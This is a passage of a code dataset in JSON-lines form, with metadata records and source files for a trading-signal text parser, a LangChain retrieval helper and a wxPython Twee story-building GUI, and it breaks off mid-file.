"call"}, {"api_name": "engine.functional.values.VContinueError", "line_number": 752, "usage_type": "argument"}, {"api_name": "engine.functional.terms", "line_number": 752, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 756, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 756, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 756, "usage_type": "name"}, {"api_name": "engine.functional.terms.NewProcedure", "line_number": 802, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 802, "usage_type": "name"}, {"api_name": "ast.Pass", "line_number": 825, "usage_type": "argument"}, {"api_name": "ast.ExpressionStatement", "line_number": 827, "usage_type": "argument"}, {"api_name": "ast.Assignment", "line_number": 833, "usage_type": "argument"}, {"api_name": "ast.Block", "line_number": 836, "usage_type": "argument"}, {"api_name": "ast.Return", "line_number": 840, "usage_type": "argument"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 843, "usage_type": "call"}, {"api_name": "ast.Raise", "line_number": 846, "usage_type": "argument"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 852, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 852, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 852, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 859, "usage_type": "call"}, {"api_name": "ast.Break", "line_number": 862, "usage_type": "argument"}, {"api_name": "ast.Continue", "line_number": 865, "usage_type": "argument"}, {"api_name": "ast.Conditional", "line_number": 868, "usage_type": "argument"}, {"api_name": "ast.While", "line_number": 879, "usage_type": "argument"}, {"api_name": "ast.For", "line_number": 891, "usage_type": "argument"}, {"api_name": "ast.Attribute", "line_number": 908, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 915, "usage_type": "call"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 918, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 918, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 920, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 920, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 920, "usage_type": "name"}, {"api_name": "ast.Try", "line_number": 929, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 942, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 942, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 942, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 943, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 943, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 943, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 949, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 949, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 961, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 961, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 961, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 962, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 962, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 970, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 970, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 970, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 971, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 971, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 971, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 972, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 972, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 972, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 973, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 973, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 973, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 977, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 977, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 977, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 978, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 978, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 978, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 979, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 979, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 984, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 984, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 984, "usage_type": "call"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 985, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 985, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 986, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 986, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 987, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 987, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 989, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 989, "usage_type": "name"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 990, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 990, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.IS", "line_number": 990, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 990, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 990, "usage_type": "attribute"}, {"api_name": "ast.VariableDeclaration", "line_number": 999, "usage_type": "argument"}, {"api_name": "ast.ProcedureDefinition", "line_number": 1004, "usage_type": "argument"}, {"api_name": "ast.PropertyDefinition", "line_number": 1012, "usage_type": "argument"}, {"api_name": "engine.functional.terms.NewProperty", "line_number": 1022, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1022, "usage_type": "name"}, {"api_name": "ast.ClassDefinition", "line_number": 1025, "usage_type": "argument"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1043, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewNamespace", "line_number": 1043, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1043, "usage_type": "name"}, {"api_name": "engine.functional.terms.NewClass", "line_number": 1047, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1047, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1047, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1047, "usage_type": "call"}, {"api_name": "ast.ImportNames", "line_number": 1054, "usage_type": "name"}, {"api_name": "ast.ImportSource", "line_number": 1054, "usage_type": "name"}, {"api_name": "util.check_type", "line_number": 1056, "usage_type": "call"}, {"api_name": "modules.ModuleSpecification", "line_number": 1056, "usage_type": "argument"}, {"api_name": "ast.ImportSource", "line_number": 1059, "usage_type": "argument"}, {"api_name": "ast.ImportNames", "line_number": 1067, "usage_type": "argument"}, {"api_name": "engine.functional.reference.AbsoluteFrameReference", "line_number": 1105, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1106, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewDict", "line_number": 1106, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.values.VDict.get", "line_number": 1114, "usage_type": "attribute"}, {"api_name": "engine.functional.values.VDict", "line_number": 1114, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 1116, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1116, "usage_type": "call"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1117, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.NEQ", "line_number": 1117, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 1117, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.values.VDict.set", "line_number": 1119, "usage_type": "attribute"}, {"api_name": "engine.functional.values.VDict", "line_number": 1119, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.values.VProcedure", "line_number": 1124, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewNamespace", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1143, "usage_type": "name"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewModule", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1158, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1158, "usage_type": "call"}]}
+{"seq_id": "17330651811", "text": "import json\nimport os\nfrom server.sql import sqlScripts\n\n\nclass Analyzer:\n BUY_ACTION = 1\n SELL_ACTION = 0\n STOP_LOSS_KEY = 'stop_loss'\n TAKE_PROFIT_KEY = 'take_profit'\n stop_loss = None\n take_profit_levels = []\n config = {\n \"buy_signals\": [\n \"buy\",\n \"buy now\"\n ],\n \"sell_signals\": [\n \"sell\",\n \"sell now\"\n ],\n \"telegram_user_name\": \"your_telegram_user_name\",\n \"api_id\": \"your_telegram_api_id\",\n \"api_hash\": \"your_telegram_api_hash\"\n }\n\n def __init__(self, text, dbCursor, chat_id, chat_name, serialized_chat_info):\n self.chat_id = chat_id\n self.chat_name = chat_name\n self.serialized_chat_info = serialized_chat_info\n self.dbCursor = dbCursor\n self.text = text.lower()\n self.symbol = self.identifySymbol()\n self.action = self.identifyAction()\n self.action_now = self.identifyActionNow()\n self.identifyStopLossLevel()\n self.identifyAllTakeProfitLevels()\n self.checkForConfigFiles()\n\n def identifyActionNow(self):\n if 'now' in self.text:\n return True\n\n return False\n\n def checkForConfigFiles(self):\n if not os.path.isfile('./config.json'):\n with open('./config.json', 'w') as config_file:\n json.dump(self.config, config_file)\n else:\n with open('./config.json', 'r') as config_file:\n self.config = json.load(config_file)\n\n def identifyAction(self):\n sell_counter = 0\n buy_counter = 0\n for s in self.config['sell_signals']:\n if s in self.text:\n sell_counter += 1\n\n for b in self.config['buy_signals']:\n if b in self.text:\n buy_counter += 1\n\n if buy_counter >= 1 and sell_counter == 0:\n return self.BUY_ACTION\n\n if sell_counter >= 1 and buy_counter == 0:\n return self.SELL_ACTION\n\n return None\n\n def identifySymbol(self):\n res = self.dbCursor.execute(sqlScripts.constructGetInstrumentsSql())\n allowedSymbols = res.fetchall()\n\n for symbol in allowedSymbols:\n if symbol[1].lower() in self.text:\n return symbol[2]\n\n return None\n\n def isSignalValid(self):\n if self.action is None or self.symbol is None:\n return False\n\n if self.identifyActionNow():\n return True\n\n if self.stop_loss is None or len(self.take_profit_levels) == 0:\n return False\n\n return True\n\n def identifyAllTakeProfitLevels(self):\n if self.serialized_chat_info['allow_multiple_tp']:\n for i in range(0, len(self.serialized_chat_info['take_profit_key_words']) - 1):\n current_key_word = self.serialized_chat_info['take_profit_key_words'][i]\n self.take_profit_levels.append(self.identifySingleTakeProfitLevel(current_key_word))\n self.take_profit_levels = [i for i in self.take_profit_levels if i is not None]\n else:\n self.take_profit_levels.append(\n self.identifySingleTakeProfitLevel(self.serialized_chat_info['take_profit_key_words'][0])\n )\n\n def identifyStopLossLevel(self):\n index_start = self.text.find(self.serialized_chat_info['stop_loss_key_word'].lower())\n index_end = index_start + len(self.serialized_chat_info['stop_loss_key_word'])\n skipped_first_space = False\n for i in range(index_end, len(self.text)):\n current_char = self.text[i]\n if current_char.isnumeric() or current_char == \".\":\n if self.stop_loss is None:\n self.stop_loss = str(current_char)\n continue\n\n self.stop_loss = self.stop_loss + str(current_char)\n\n else:\n if skipped_first_space is False:\n skipped_first_space = True\n continue\n else:\n break\n\n def identifySingleTakeProfitLevel(self, take_profit_key_word):\n if take_profit_key_word.lower() not in self.text:\n return\n\n take_profit_level = None\n\n index_start = self.text.find(take_profit_key_word)\n index_end = index_start + len(take_profit_key_word)\n skipped_first_space = False\n for i in range(index_end, len(self.text)):\n current_char = self.text[i]\n if current_char.isnumeric() or current_char == \".\":\n if take_profit_level is None:\n take_profit_level = str(current_char)\n continue\n\n take_profit_level = take_profit_level + str(current_char)\n\n else:\n if skipped_first_space is False:\n skipped_first_space = True\n continue\n else:\n break\n\n return take_profit_level\n\n def printDetails(self):\n print(\"Signal Info:\")\n print(f\"Instrument: {self.action} {self.symbol}\")\n print(f\"Take-profit-levels: {self.take_profit_levels}\")\n print(f\"Stop-loss: {self.stop_loss}\")\n", "repo_name": "NagaiMatsuge/ucharKetmon", "sub_path": "server/utils/analyzer/analyzer.py", "file_name": "analyzer.py", "file_ext": "py", "file_size_in_byte": 5196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 49, "usage_type": "call"}, {"api_name": "json.load", "line_number": 52, "usage_type": "call"}, {"api_name": "server.sql.sqlScripts.constructGetInstrumentsSql", "line_number": 74, "usage_type": "call"}, {"api_name": "server.sql.sqlScripts", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "8279342456", "text": "from dotenv import load_dotenv\nfrom langchain.chains import RetrievalQA\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.embeddings import HuggingFaceInstructEmbeddings\nfrom langchain import HuggingFacePipeline\n\nfrom langchain.vectorstores import Chroma\nfrom langchain.docstore.document import Document\nfrom langchain.text_splitter import CharacterTextSplitter, TokenTextSplitter, RecursiveCharacterTextSplitter\nfrom server.oobabooga_llm import OobaboogaLLM\nfrom langchain.llms import OpenAI\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom constants import *\nimport os\n\nload_dotenv()\nTEST_FILE = os.getenv(\"TEST_FILE\")\nEMB_INSTRUCTOR_XL = os.getenv(\"EMBEDDINGS_MODEL\")\n\nCHROMA_SETTINGS = {} # Set your Chroma settings here\ndef load_tools(llm_model):\n \n def ingest_file(file_path):\n # Load text file\n with open(file_path, 'r') as file:\n text = file.read()\n\n # Use filename as title\n title = os.path.basename(file_path)\n docs = {title: text}\n embedding = HuggingFaceInstructEmbeddings(model_name=EMB_INSTRUCTOR_XL, model_kwargs={\"device\": \"cuda:2\"})\n \n documents = [Document(page_content=docs[title]) for title in docs]\n # Split by section, then split by token limit\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=100, chunk_overlap=20)\n texts = text_splitter.split_documents(documents)\n \n text_splitter = TokenTextSplitter(chunk_size=512,chunk_overlap=10, encoding_name=\"cl100k_base\") # may be inexact\n texts = text_splitter.split_documents(texts)\n \n vectordb = Chroma.from_documents(documents=texts, embedding=embedding)\n retriever = vectordb.as_retriever(search_kwargs={\"k\":4})\n\n print(title)\n print(retriever)\n \n return retriever, title\n\n file_path = TEST_FILE\n retriever, title = ingest_file(file_path)\n\n def searchChroma(key_word):\n hf_llm = OobaboogaLLM() \n qa = RetrievalQA.from_chain_type(llm=hf_llm, chain_type=\"stuff\",\\\n retriever=retriever, return_source_documents=False)\n \n print(qa)\n res=qa.run(key_word)\n print(res)\n return res\n\n dict_tools = {\n 'Chroma Search': searchChroma,\n 'File Ingestion': ingest_file,\n }\n return dict_tools\n\n\n", "repo_name": "Karajan421/langchain_guidance", "sub_path": "server/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 2381, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 17, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "langchain.embeddings.HuggingFaceInstructEmbeddings", "line_number": 31, "usage_type": "call"}, {"api_name": "langchain.docstore.document.Document", "line_number": 33, "usage_type": "call"}, {"api_name": "langchain.text_splitter.RecursiveCharacterTextSplitter", "line_number": 35, "usage_type": "call"}, {"api_name": "langchain.text_splitter.TokenTextSplitter", "line_number": 38, "usage_type": "call"}, {"api_name": "langchain.vectorstores.Chroma.from_documents", "line_number": 41, "usage_type": "call"}, {"api_name": "langchain.vectorstores.Chroma", "line_number": 41, "usage_type": "name"}, {"api_name": "server.oobabooga_llm.OobaboogaLLM", "line_number": 53, "usage_type": "call"}, {"api_name": "langchain.chains.RetrievalQA.from_chain_type", "line_number": 54, "usage_type": "call"}, {"api_name": "langchain.chains.RetrievalQA", "line_number": 54, "usage_type": "name"}]}
+{"seq_id": "17283598333", "text": "#\n# gui.py\n#\n# This handles the project window and menus.\n#\n\nimport os, sys, wx, urllib\nfrom project import Project\nimport tiddlywiki\n\nID_HELP = 101\nID_GOOGLE_GROUP = 102\n\nID_NEW_PROJECT = 103\nID_OPEN_PROJECT = 104\nID_SAVE_PROJECT = 105\nID_SAVE_PROJECT_AS = 106\n\nID_ADD_SOURCE = 107\nID_REMOVE_SOURCE = 108\nID_BUILD = 109\nID_PROOF = 110\n\nID_TARGET_CHOICE = 201\nID_SAVEAS_BUTTON = 202\nID_BUILD_BUTTON = 203\nID_ADD_BUTTON = 204\n\n\nclass ProjectWindow (wx.Frame):\n\n\t#\n\t# constructors\n\t#\n\n\tdef __init__ (self, parent):\n\t\n\t\t# restore our config and recently-opened files\n\t\t\n\t\tself.config = wx.Config('Tweebox')\n\t\tself.recentFiles = wx.FileHistory(5)\n\t\tself.recentFiles.Load(self.config)\n\t\n\t\t# get a new Project object\n\t\t\n\t\tself.project = Project()\n\t\tself.fileName = ''\n\t\tself.dirty = False\n\n\t\t# create the window\n\n\t\twx.Frame.__init__(self, parent, wx.ID_ANY, 'Untitled Project', \\\n\t\t\t\t\t\t size = (550, 250), style = wx.CLOSE_BOX | wx.CAPTION | wx.SYSTEM_MENU | wx.MINIMIZE_BOX)\n\t\tself.addMenus()\t\t\n\t\tself.addControls()\n\t\tself.CreateStatusBar()\n\t\t\t\t\n\t\t# show our window\n\t\n\t\tself.Centre()\n\t\tself.Show(True)\n\t\t\n\t\t# try opening the most recent project\n\t\t\n\t\tif self.recentFiles.GetCount() > 0:\n\t\t\tself.fileName = self.recentFiles.GetHistoryFile(0)\n\t\t\tself.loadFile(failLoudly = False)\n\t\t\t\n\t\t\n\tdef addMenus (self):\n\t\n\t\t# create menus\n\n\t\thelpMenu = wx.Menu()\n\t\thelpMenu.Append(wx.ID_ABOUT, '&About Tweebox')\n\t\thelpMenu.Append(ID_HELP, 'Tweebox &Help')\n\t\thelpMenu.Append(ID_GOOGLE_GROUP, 'Discuss Twee Online')\n\t\t\n\t\tfileMenu = wx.Menu()\n\t\tself.fileNewItem = fileMenu.Append(ID_NEW_PROJECT, '&New Project\\tCtrl-N')\n\t\tself.fileOpenItem = fileMenu.Append(ID_OPEN_PROJECT, '&Open Project...\\tCtrl-O')\n\t\tfileMenu.AppendSeparator()\n\t\tself.fileSaveItem = fileMenu.Append(ID_SAVE_PROJECT, '&Save Project\\tCtrl-S')\n\t\tself.fileSaveAsItem = fileMenu.Append(ID_SAVE_PROJECT_AS, 'S&ave Project As...')\n\t\tfileMenu.AppendSeparator()\n\t\tself.fileQuitItem = fileMenu.Append(wx.ID_EXIT, '&Exit\\tCtrl-Q')\n\t\tself.recentFiles.UseMenu(fileMenu)\n\t\tself.recentFiles.AddFilesToMenu()\n\n\t\tprojectMenu = wx.Menu()\n\t\tself.projectAddItem = projectMenu.Append(ID_ADD_SOURCE, 'Add Source File...')\n\t\tself.projectRemoveItem = projectMenu.Append(ID_REMOVE_SOURCE, 'Remove Source File')\n\t\tprojectMenu.AppendSeparator()\n\t\tself.projectBuildItem = projectMenu.Append(ID_BUILD, '&Build Story\\tCtrl-B')\n\t\tself.projectProofItem = projectMenu.Append(ID_PROOF, '&Proof Story\\tCtrl-P')\n\t\t\n\t\t# create menu bar\n\t\t\n\t\tmenuBar = wx.MenuBar()\n\t\tmenuBar.Append(fileMenu, '&File')\n\t\tmenuBar.Append(projectMenu, '&Project')\n\t\tmenuBar.Append(helpMenu, '&Help')\n\t\tself.SetMenuBar(menuBar)\t\t\n\n\t\t# add menu events\n\t\t\n\t\twx.EVT_UPDATE_UI(self, -1, self.updateUI)\n\t\t\n\t\twx.EVT_MENU(self, wx.ID_ABOUT, self.onAbout)\n\t\twx.EVT_MENU(self, ID_HELP, self.onHelp)\n\t\twx.EVT_MENU(self, ID_GOOGLE_GROUP, self.onGoogleGroup)\n\t\twx.EVT_MENU(self, ID_NEW_PROJECT, self.onNew)\n\t\twx.EVT_MENU(self, ID_OPEN_PROJECT, self.onOpen)\n\t\twx.EVT_MENU(self, ID_SAVE_PROJECT, self.onSave)\n\t\twx.EVT_MENU(self, ID_SAVE_PROJECT_AS, self.onSaveAs)\n\t\twx.EVT_MENU(self, wx.ID_EXIT, self.onQuit)\n\t\twx.EVT_MENU(self, wx.ID_FILE1, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE2, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE3, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE4, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE5, self.onOpenRecent)\n\t\twx.EVT_MENU(self, ID_ADD_SOURCE, self.onAddSource)\n\t\twx.EVT_MENU(self, ID_REMOVE_SOURCE, self.onRemoveSource)\n\t\twx.EVT_MENU(self, ID_BUILD, self.onBuild)\n\t\twx.EVT_MENU(self, ID_PROOF, self.onProof)\n\n\n\tdef addControls (self):\n\t\tpanel = wx.Panel(self)\n\t\tmainSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\tpanel.SetSizer(mainSizer)\n\t\t\n\t\t# sources on the left half\n\t\t\n\t\tsourcesPanel = wx.Panel(panel)\n\t\tsourcesBox = wx.StaticBox(sourcesPanel, wx.ID_ANY, 'Source Files')\n\t\tsourcesSizer = wx.StaticBoxSizer(sourcesBox, wx.VERTICAL)\n\t\tsourcesPanel.SetSizer(sourcesSizer)\n\t\t\n\t\tself.sourcesList = wx.ListBox(sourcesPanel)\n\t\tself.addButton = wx.Button(sourcesPanel, ID_ADD_BUTTON, 'Add')\n\t\twx.EVT_BUTTON(self, ID_ADD_BUTTON, self.onAddSource)\n\t\t\n\t\tsourcesSizer.Add(self.sourcesList, 1, wx.EXPAND)\n\t\tsourcesSizer.Add(self.addButton, 0, wx.TOP | wx.ALIGN_RIGHT, 8)\n\t\t\n\t\t# story file stuff on the right half\n\t\t\n\t\tstoryPanel = wx.Panel(panel)\n\t\tstoryBox = wx.StaticBox(storyPanel, wx.ID_ANY, 'Story File')\n\t\tstorySizer = wx.StaticBoxSizer(storyBox, wx.VERTICAL)\n\t\tstoryPanel.SetSizer(storySizer)\n\t\t\n\t\t# file destination row\n\t\t\n\t\tsaveAsPanel = wx.Panel(storyPanel)\n\t\tsaveAsSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\tsaveAsPanel.SetSizer(saveAsSizer)\n\t\t\n\t\tself.saveAsText = wx.StaticText(saveAsPanel, wx.ID_ANY, 'Save As:')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\tself.saveAsButton = wx.Button(saveAsPanel, ID_SAVEAS_BUTTON, 'Set')\t\t\t\t\t\t\t\t \n\t\twx.EVT_BUTTON(self, ID_SAVEAS_BUTTON, self.onSetDestination)\n\t\t\n\t\tsaveAsSizer.Add(self.saveAsText, 1, wx.TOP | wx.BOTTOM | wx.EXPAND, 10)\n\t\tsaveAsSizer.Add(self.saveAsButton, 0, wx.TOP | wx.BOTTOM, 8)\n\n\t\tstorySizer.Add(saveAsPanel, 0, wx.EXPAND, 0)\n\t\t\n\t\t# target row\n\n\t\ttargetPanel = wx.Panel(storyPanel)\n\t\ttargetSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\ttargetPanel.SetSizer(targetSizer)\n\t\t\n\t\tself.targetLabel = wx.StaticText(targetPanel, wx.ID_ANY, 'Story Format:')\n\n\t\tself.targetChoice = wx.Choice(targetPanel, ID_TARGET_CHOICE, \\\n\t\t\t\t\t\t\t\t\t choices = ('Sugarcane', 'Jonah', 'TiddlyWiki 2', 'TiddlyWiki 1.2'))\n\t\tself.targetChoice.SetSelection(0)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\twx.EVT_CHOICE(self, ID_TARGET_CHOICE, self.onChangeTarget)\n\t\t\n\t\ttargetSizer.Add(self.targetLabel, 1, wx.TOP | wx.BOTTOM, 10)\n\t\ttargetSizer.Add(self.targetChoice, 1, wx.TOP | wx.BOTTOM, 8)\n\t\t\n\t\tstorySizer.Add(targetPanel, 0, wx.ALL | wx.EXPAND, 0)\n\t\t\n\t\t# add our halves to the main panel\n\t\t\n\t\tmainSizer.Add(sourcesPanel, 1, wx.ALL | wx.EXPAND, 8)\n\t\tmainSizer.Add(storyPanel, 1, wx.ALL | wx.EXPAND, 8)\n\t\t\t\t\n\t#\n\t# utility functions\n\t#\n\n\tdef updateUI (self, event):\t\t\n\t\tif self.sourcesList.GetSelection() == wx.NOT_FOUND:\n\t\t\tself.projectRemoveItem.Enable(False)\n\t\telse:\n\t\t\tself.projectRemoveItem.Enable(True)\n\t\t\t\n\t\tif self.sourcesList.IsEmpty():\n\t\t\tself.projectBuildItem.Enable(False)\n\t\t\tself.projectProofItem.Enable(False)\n\t\telse:\n\t\t\tself.projectBuildItem.Enable(True)\n\t\t\tself.projectProofItem.Enable(True)\n\t\t\t\n\t\t\t\n\tdef updateTitle (self):\n\t\tif self.fileName == '':\n\t\t\ttitle = 'Untitled Project'\n\t\telse:\n\t\t\tbits = os.path.splitext(self.fileName)\n\t\t\ttitle = os.path.basename(bits[0])\n\t\t\t\n\t\tself.SetTitle('Tweebox - ' + title)\n\t\t\n\t\n\tdef updateDestination (self):\n\t\tlabel = 'Save As: '\n\t\t\n\t\tif self.project.destination != '':\n\t\t\tlabel += os.path.basename(self.project.destination)\n\t\t\n\t\tself.saveAsText.SetLabel(label)\n\t\t\n\t\t\n\tdef closeProject (self):\n\t\tif self.dirty:\n\t\t\tbits = os.path.splitext(self.fileName)\n\t\t\ttitle = os.path.basename(bits[0])\n\n\t\t\tmessage = 'Close ' + title + ' without saving changes?'\n\t\t\tdialog = wx.MessageDialog(self, message, 'Save Changes', \\\n\t\t\t\t\t\t\t\t\t wx.ICON_QUESTION | wx.YES_NO | wx.NO_DEFAULT)\n\t\t\treturn (dialog.ShowModal() == wx.ID_YES)\n\t\telse:\n\t\t\treturn True\n\t\t\t\n\n\tdef targetToReadable (self, target):\n\t\tif target == 'sugarcane':\n\t\t\treturn 'Sugarcane'\n\t\t\n\t\tif target == 'jonah':\n\t\t\treturn 'Jonah'\n\t\t\t\n\t\tif target == 'tw2':\n\t\t\treturn 'TiddlyWiki 2'\n\t\t\t\n\t\tif target == 'tw':\n\t\t\treturn 'TiddlyWiki 1.2'\n\t\t\n\t\n\tdef readableToTarget (self, readable):\n\t\tif readable == 'Sugarcane':\n\t\t\treturn 'sugarcane'\n\t\t\n\t\tif readable == 'Jonah':\n\t\t\treturn 'jonah'\n\t\t\t\n\t\tif readable == 'TiddlyWiki 2':\n\t\t\treturn 'tw2'\n\t\t\t\n\t\tif readable == 'TiddlyWiki 1.2':\n\t\t\treturn 'tw'\n\t\t\t\n\t#\n\t# event handlers\n\t#\n\n\tdef onAbout (self, event):\n\t\tinfo = wx.AboutDialogInfo()\n\t\tinfo.SetName('Tweebox')\n\t\tinfo.SetVersion('2.1')\n\t\tinfo.SetDescription('\\nA tool for creating interactive stories\\nwritten by Chris 